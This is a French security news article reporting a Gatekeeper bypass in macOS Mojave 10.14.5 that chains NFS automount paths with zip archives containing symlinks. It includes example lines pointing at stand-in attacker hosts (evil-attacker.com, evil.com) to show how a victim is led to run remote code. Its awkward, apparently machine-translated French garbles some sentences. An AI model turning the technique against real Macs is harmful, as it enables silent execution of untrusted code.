Une vulnérabilité non corrigée dans macOS 10.14.5 également connu sous le nom de Mojave a été récemment découvert. La faille pourrait permettre à un attaquant d'exécuter du code arbitraire sans nécessiter d'interaction de l'utilisateur, contournant ainsi Gatekeeper.
Cette découverte vient du chercheur Filippo Cavallarin du segment, une société de cybersécurité basée en Italie. "Sur Mac OS X version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,» Le chercheur a écrit.
Comment est le by-pass Gatekeeper possible?
Première, il convient de noter qu'il est dans la conception de Gatekeeper d'accepter les deux disques externes et les partages réseau comme lieu sûr, permettant des applications qu'ils contiennent de fonctionner sans problèmes. Cependant, en réunissant deux caractéristiques légitimes de macOS, il est possible de tromper le Gatekeeper et son «comportement prévu".
Si, quelles sont ces caractéristiques? La première permet à un utilisateur de monter automatiquement un partage réseau en acceptant simplement un chemin commençant par « / net / »:
Par exemple
ls /net/evil-attacker.com/sharedfolder/
fera l'os lire le contenu de la « sharedfolder’ sur l'hôte distant (evil-attacker.com) en utilisant NFS.
L'autre caractéristique est sur les archives zip contenant des liens symboliques qui pointent vers des emplacements arbitraires. En outre, le logiciel qui décompresse les fichiers zip sur macOS n'effectue aucun contrôle sur les liens symboliques avant de les créer, le chercheur a expliqué.
Comment un travail d'attaque? Un attaquant pourrait concevoir un fichier zip avec un lien symbolique vers un point final contrôlé hacker-automount (ex Documents -> /net/evil.com/Documents) et pourrait l'envoyer à un système ciblé. L'utilisateur malveillant télécharger l'archive, et va extraire le fichier malveillant sans se douter de rien.
Maintenant, la victime est dans un endroit contrôlé par l'attaquant, mais la confiance de Gatekeeper, de sorte que toute exécutable contrôlé par l'attaquant peut être exécuté sans aucun avertissement. La façon dont Finder est conçu (extensions ex cacher .app, cacher le chemin complet de titlebar) rend cette tecnique très efficace et difficile à repérer, le chercheur a noté.
Il y a aussi un démonstration vidéo de la façon dont fonctionne cette dérivation Gatekeeper.
Ce n'est pas le premier cas de macOS accumulation dans la protection a.k.a. Gatekeeper contournée. En Février de cette année, les chercheurs en sécurité de Trend Micro ont découvert qu'un fichier .exe de Windows malveillant peut infecter les ordinateurs Mac, et pourrait télécharger des logiciels malveillants infostealer accompagnés de logiciels publicitaires sur leurs systèmes.
Dans ce cas, les fichiers .exe ont pu se soustraire à la protection de Gatekeeper parce qu'ils ne sont pas contrôlés par le logiciel, conçu pour vérifier uniquement les fichiers Mac natifs. Cela pourrait conduire à contourner la vérification de la signature de code et la vérification.
Milena Dimitrova
Un écrivain et gestionnaire de contenu inspiré qui travaille avec SensorsTechForum depuis le début du projet. Un professionnel avec 10+ années d'expérience dans la création de contenu engageant. Axé sur la vie privée des utilisateurs et le développement des logiciels malveillants, elle croit fermement dans un monde où la cybersécurité joue un rôle central. Si le bon sens n'a pas de sens, elle sera là pour prendre des notes. Ces notes peuvent se tourner plus tard dans les articles! Suivre Milena @Milenyim
Suivez-moi: